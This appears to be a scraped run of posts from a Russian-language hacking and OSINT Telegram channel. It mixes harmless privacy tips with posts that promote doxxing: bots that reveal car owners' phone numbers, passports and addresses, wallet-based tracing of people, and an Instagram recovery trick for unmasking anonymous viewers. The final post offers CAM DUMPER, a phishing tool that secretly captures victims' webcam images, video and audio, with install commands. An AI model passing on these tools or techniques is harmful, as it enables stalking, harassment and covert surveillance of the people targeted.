CYBERDEN | Хакинг и Кибербезопасность
3.98K subscribers
30 photos
1 file
105 links
🔸Лайфхаки
🔸Пентест (этичный хакинг)
🔸Секреты информационной безопасности
🔸Программирование
🔸Обучение

По любым вопросам: @rtdream
Курс по хакингу: https://cyberden.pw/kurs
Реклама: https://t.me/rtdream
Download Telegram
Telegram заблокировал и удалил популярного бота «Глаз Бога» для поиска информации о людях.
На канал бота было подписано более 800 тысяч человек. Только зная ФИО или номер телефона, пользователь мог за определённую плату узнать и другие данные: фото, номер автомобиля, объявления на Авито, почту, ссылки и пароли соцсетей.
Кроме того, мессенджер удалил и других поисковых ботов Smart Search Bot, Mail Search Bot и «Архангел».

UPD 12.01: бот теперь доступен по новому адресу.

Ранее Роскомнадзор направил в Telegram запрос об удалении ботов, раскрывающих персональную информацию о пользователях.
Как пробить человека по номеру кошелька + подборка поисковиков.

Сегодня я собрал для тебя подборку сервисов, благодаря которым, ты можешь узнать полезную информацию о цели с помощью номера кошелька. Также, ты узнаешь о полезных поисковиках, не о «Яндексе» или «Google», а о других сервисах, которые действительно лучше, чем лидеры рынка. Пусть и не во всём.

LTC, DASH, DOGE.
Blockcypher — информация о транзакциях;
Blockchair — информация о транзакциях;

BTC.
Blockchair — информация о транзакциях;
Blockcypher — информация о транзакциях;
Intelx — найдет информацию о Bitcoin адресе;
Maltego — визуальное представление и анализ транзакций;
OXT — визуальное представление и анализ транзакций в браузере;

ETH.
Etherchain — анализ Ethereum адреса;
Etherscan — анализ Ethereum адреса;
Blockchair — информация о транзакциях;

Другое:
Coin360
https://bitref.com/
https://etherscan.io/
https://xmrchain.net/
https://tokenview.com/
https://blockchair.com/
https://www.etherchain.org/
https://bitcoinwhoswho.com/
https://localmonero.co/blocks
https://www.blockonomics.co/
https://www.livecoinwatch.com/
https://www.walletexplorer.com/
https://explorer.bitcoin.com/bch
https://www.walletexplorer.com/
https://www.blockchain.com/explorer

Поисковики.
Not Evil — Ищет там, куда Google, «Яндексу» и другим поисковикам вход закрыт в принципе.
Pipl — система, предназначенная для поиска информации о конкретном человеке;
Wolfram | Alpha — вычислительно-поисковая система;
Carrot2 — определяет объекты или категории привязанные к слову в поисковом запросе;
Boardreader — поисковик по форумам;
Searchcode — поиск по коду в открытых репозиториях;
Intelx — найдет по email, доменам, URL-адресам, IP-адресам, CIDR, btc, хешам IPFS и т.д.
Kribrum — поиск по социальным сетям;
Secapps — автоматический поиск и создание карт взаимосвязей;
Occrp — поиск по базам данных, файлам, реестрам компаний и т.д.

Всем сочных деанончиков ✌️
Подборка сервисов для пробива информации | Фото, картинки, документы

▪️ Для файла формата изображение
metapicz.com – покажет EXIF
stolencamerafinder.com – определит EXIF и по этим данным найдет какие еще фото были сделаны этим устройством
exif.regex.info – извлекает метаданные
www.get-metadata.com – извлекает метаданные
29a.ch – фото-форензика, анализ изображения на изменения
stylesuxx.github.io – декодирует скрытое сообщение в изображении
Depix (t) – депикселизирует текст на картинке
www.focusmagic.com (t) – восстановит детали и резкость размытых фотографий

▪️ Поиск по картинке
YandexGoogleBingMail.ru
searchbyimage.app – находит товары в многих интернет-магазинах
thieve.co – находит товары в Aliexpress
aliseeks.com – находит товары в Aliexpress и eBay
labs.tib.eu – найдет примерное место съемки фото

▪️ Для файла формата документ
exif.regex.info – извлекает метаданные
www.get-metadata.com – извлекает метаданные

▪️ Инструменты
draftable.com – сравнивает 2 документа показывает разницу

▪️ Для файла формата DS_STORE
intelx.io – узнайте имена файлов скрытые в файле

▪️ Для файла формата HAR
stevesie.com – покажет содержимое файла в удобном виде
googleapps.com – покажет содержимое файла в удобном виде

▪️ Для файла других форматов
exif.regex.info – извлекает метаданные
www.get-metadata.com – извлекает метаданные
toolsley.com – определяет тип файла
Подборка сервисов для пробива информации | Транспорт

🚘 По российскому гос. номеру или VIN авто
:
@av100_bot — дает крупный отчет с данными владельца, историей авто и фото, получить бесплатный отчет возможно только если вы пригласите другой аккаунт в бот
vin01.ru — найдет VIN и по нему покажет историю регистраций, историю ДТП, пробег, ОСАГО и многое другое
vinformer.su — проверка ПТС, поиск по VIN
shtrafometr.ru — найдет штрафы, поиск по ТС (VIN) или номера кузова или шасси
dkbm-web.autoins.ru — дает сведения о договоре ОСАГО, поиск по VIN и по номеру авто, а так же можно искать по номеру кузова или шасси, необходимо знать дату, на которую запрашиваются сведения договора ОСАГО
@AntiParkonBot — найдет номер телефона владельца, маловероятно что результат будет
@smart_search_3_bot — находит ФИО, VIN, телефон, марку автомобиля
nomerogram.ru — найдет фото автомобиля, поиск по гос. номеру
@Quick_OSINT_bot — дает данные владельца, ФИО, дату рождения, паспорт, номер телефона, адреса, объявления и парковки
checkvehicle.sfri.ru — сервис проверки управляемых инвалидом авто или используемых для перевозки инвалида
eaisto.info — поиск по гос.номеру, VIN, номеру кузова, номеру ДК, выдаст актуальную информацию о тех.осмотре, и историю прохождения
@ru_auto_bot — находит VIN, модель, марку и СТС
@clerkinfobot — находит ФИО, VIN, CNC, марку, ОСАГО

✈️ Поиск по позывному самолета
de.flightaware.com — найдет историю перелетов, даст общую информацию о воздушном судне
globe.adsbexchange.com — найдет на карте все самолеты в воздухе с таким позывным, есть военные воздушные судна
planespotters.net — находит историю самолета, тех. состояние, авиакомпании
avherald.com — история инцидентов самолета
sanctionssearch.ofac.treas.gov — поиск в санкционном списке США

Поиск по модели самолета:
rzjets.net/aircraft — база моделей джетов, найдет владельца, регистрационный номер и многое другое
radarbox.com — найдет все самолеты в небе
globe.adsbexchange.com — найдет на карте все самолеты в воздухе такой модели, есть военные воздушные судна
seatguru.com — схема сидений самолета, есть номера мест
planespotters.net — находит историю самолета, позывные, тех. состояние, авиакомпании
avherald.com — история инцидентов самолета

🚆 Поиск по номеру поезда в Европе
pass.rzd.ru — показывает график следования, необходимо указать станцию прибытия на территории России
www.sncf.com — показывает расписание движения поезда в конкретную дату на территории Франции
bahn.de — расписание движения поезда в конкретную дату на территории Германии
junatkartalla.vr.fi — фактическое движение поезда на карте в реальном времени, есть расписание остановок на территории Финляндии

Поиск по номеру вагона:
gdevagon.ru (r) — проверит действительность номера

🛳 Поиск по имени судна:
marinetraffic.com — найдет позывной, MMSI, IMO, рейсы и историю имени судна
maritime-connector.com — найдет базовую информацию и данные о владельце
www.vesselfinder.com — найдет судно на карте в реальном времени
sanctionssearch.ofac.treas.gov — поиск в санкционном списке США
Поднимаем собственный VPN в два клика

Amnezia — бесплатное приложение для создания собственного VPN буквально в пару кликов. Сам себе VPN провайдер. В текущем релизе используется OpenVPN over ShadowSocks.
Как узнать, кто тайно использует вашу веб-камеру

Получив доступ к вашей веб-камере, злоумышленник может представлять серьезную угрозу вашей личной жизни. Хорошая новость в том, что управлять камерой так, чтобы никто не догадался, очень сложно. Одним из способов проверить, какие программы используют веб-камеру вашего компьютера — утилита Procesed Explorer от Microsoft.

Для начала понадобиться узнать физическое имя нашей веб-камеры. Откроем диспетчер устройств (Win + R) и выполним команду devmgmt.msc. В устройствах обработки изображения, открываем свойства веб-камеры. На вкладке «Сведения» в выпадающем списки находим «Имя объекта физического устройства» и копируем появившееся значение.

Скачав и запустив программу от имени администратора, в поиске (Ctrl + F) вставляем имя нашей веб-камеры и нажимаем «Search». В списке отражаться все процессы использующие нашу веб-камеру. Нажав ПКМ и выбрав «Properties» можно просмотреть подробные свойства выбранного процесса и завершить его при необходимости.
Подменяем свое местоположение в Google Chrome

Салют, бандиты Чтобы получить доступ к контенту недоступному в вашей стране на многих сервисах одного только прокси-сервера или VPN не будет достаточно если требуется доступ к вашему местоположению. Geolocation API доступное в JavaScript определяет местоположение с точностью до 15 метров.

В такой ситуации плагин Location Guard это наиболее очевидный способ подменить или вообще скрыть вашу геолокацию. Location Guard добавляет «шума» (Как расширение Canvas Fingerprint Defender для элементов Canvas) к реальным координатам ~> веб-сайты получают ложные данные.

Безопасности пост ✌️
​​Попросил баристу сделать кофе с логотипом Tor Browser 😀 Шучу, случайно вышло. Всем безопасности! 😎
Создаем искусственный голос

AMAI — онлайн-сервис для создания искусственного голоса. Инструмент позволяет создать неотличимый от настоящего голос. Сервис синтезирует любую фразу длительностью не более 10 секунд на разных языках.

Технология AMAI работает на основе искусственного интеллекта ✌️
Проверяем пароль на устойчивость к взлому

Kaspersky Password Checker — весьма неплохой чекер паролей на устойчивость к взлому и наличии в базах.
​​Отключаем WebRTC в Firefox

WebRTC — это протокол, использующий для своей работы JavaScript. Через него ваш настоящий IP-адрес может просочиться через VPN-сервис или Tor Browser.

WebRTC Leak Shield — браузерное расширения для предотвращения утечки вашего IP адреса через WebRTC.

Безопасности пост ✌️
Как скопировать текст из любой программы или окна?!

Скачал программу, установил, уже открыл победную «Балтику», как вдруг.. ERROR! И не говори, что так не было!

Textify — это бесплатная portable-утилита, которая копирует любой текст. Программа, окно или элемент интерфейса.. без шансов для всех! Интерфейс максимально лаконичный: никаких настроек практически нет. Занимает всего лишь 3 МБ оперативки. По дефолту уютно прячется в трее панели задач.
OSINT инструмент для Termux

007-TheBond — инструмент для сканирования номера телефона, поиска в интернете, поиска имени пользователя в социальных сетях и детальное сканирование аккаунта Instagram,

Установка

$
pkg upgrade
$ pkg install git python
$ git clone https://github.com/Deadshot0x7/007-TheBond
$ cd 007-TheBond
$ python -m venv venv
$ source venv/bin/activate
$ ./setup.sh

Запуск

$
python 007-TheBond.py
Устанавливаем крутой ретро терминал в Linux

cool-retro-term инструмент, который позволит сделать терминал в стиле Fallout.

Установка

sudo apt install cool-retro-term

Запуск

sudo cool-retro-term

Немного визуала вам в Терминал! 😎
Комбайн для исследования IP и сайтов в виде ТГ-бота

@iptools_robot будет полезен как расследователям, так и ИБшникам.

Количество функций — мое почтение.
Информация про IP, WHOIS, получение прокси, поиск субдоменов, поиск всех ссылок на сайте, поиск в Shodan и еще куча других полезных команд.

Понравилась быстрая выдача результатов (иногда практически мгновенная) и то, что некоторые операции, например, парсинг ссылок с сайта или поиск реального IP за Cloudflare, теперь в удобном формате в телеге. Не нужно Spiderfoot запускать лишний раз!
Как определить близкое окружение цели по Instagram-аккаунту

Ещё в 1947-ом году аналитик ЦРУ Кен Шерман сообщил, что порядка 80% информации страна собирает из открытых источников, а ведь тогда даже не было интернета! И лишь оставшиеся 20% приходятся на профессиональную работу агентов и шпионов.

Вот такой вот современный «джеймс бонд», заключённый в поисковую строку интернета! Разведка по открытым источникам называется «OSINT». И послужить эта технология может не только государствам, но и простым смертным тоже — например, чтобы узнать о человеке больше.

STERRA в пару кликов собирает списки подписчиков и подписок в Instagram, а затем сверяет данные. Есть совпадение? Значит, этот пользователь однозначно больше, чем просто поклонник или наоборот кумир! Наш клиент! Списки, которые собирает STERRA, можно использовать дальше — они экспортируются в XLS, CSV и JSON. Помимо юзернейма пользователей, сервис собирает общую информацию: количество подписчиков и подписок, имя, количество постов, bio.

Пробивай, веселись ✌️
Как узнать кто смотрит ваши истории в Instagram с фейка

В очередной раз заметив, что ваши истории просматривает незаполненный Instagram-профиль, становится любопытно, кто же за ним скрывается. Это может оказаться как случайный посетитель, так и прячущийся знакомый, которого запросто можно рассекретить.

Чтобы определить, кто просматривает истории с поддельного аккаунта, нужно нажать по своему логину в Instagram и выбрать «Добавить аккаунт», затем «Войти в существующий аккаунт», а после «Переключить аккаунты». В следующем окне выбираем «Получить помощь со входом в систему» и вводим логин подозрительного профиля. Кликаем по каждому из пунктов: «Отправить электронное письмо» и «Отправить SMS».

При поочередном нажатии, вы узнаете первую и две последних цифры номера телефона, а так же первую и последнюю букву привязанной почты, на которую отправляется письмо восстановления доступа. Зная эти данные, вы сможете сверить ее со своей телефонной книгой и определить, кто же из знакомых использует дополнительный аккаунт.
Wayback Keyword Search

Новый инструмент для сохранения контента с Wayback Machine и последующего поиска по скачанному контенту.

Выбираете нужный домен, а затем вводите ключевое слово, а инструмент выведет полученные результаты на экран.
Как удобно подбирать шрифты

Подбирать шрифты в дизайне — тоже самое, что сочетать ингредиенты в еде. Если шрифты несовместимы, то клиенту, вероятнее всего, станет плохо. Чтобы просто и наглядно оценить, как разные шрифты сочетаются между собой, мы нашли один интересный сайт.

René — нейросеть в виде сайта, которая «играет» с шрифтами за вас. Её создатель – Джон Голд, разработчик из Airbnb и TheGrid.
Нейросеть помогает дизайнерам и разработчикам сэкономить время при составлении подборки шрифтов для разных проектов.

Интерфейс довольно-таки прост и интуитивно понятен человеку, который сталкивался со шрифтами хотя бы пару раз в жизни.

Справа расположена панель инструментов, на которой можно выбрать нужный тег, тип, семейство шрифта, размер, толщину. При внесении правок сайт для быстрого сравнения добавляет блок рядом с новыми параметрами.
Взламываем веб-камеру с помощью фишинговой атаки

CAM DUMPER — утилита, которая делает снимок с веб-камеры жертвы при переходе по вредоносной ссылке.

Мы уже публиковали несколько схожих инструментов, тем не менее у CAM DUMPER есть ряд преимуществ — вредоносная страница имеет протокол HTTPS, так же присутствует возможность записывать видео и звук.

Установка

$
apt update && apt upgrade
$ apt install git php wget curl jq
$ git clone https://github.com/LiNuX-Mallu/CAM-DUMPER.git
$ cd CAM-DUMPER
$ chmod +x camdumper.sh
$ ./camdumper.sh

Разработчик так же рекомендует установить Material Files, для удобного управления захваченными целями.

Строго в ознакомительных целях ✌️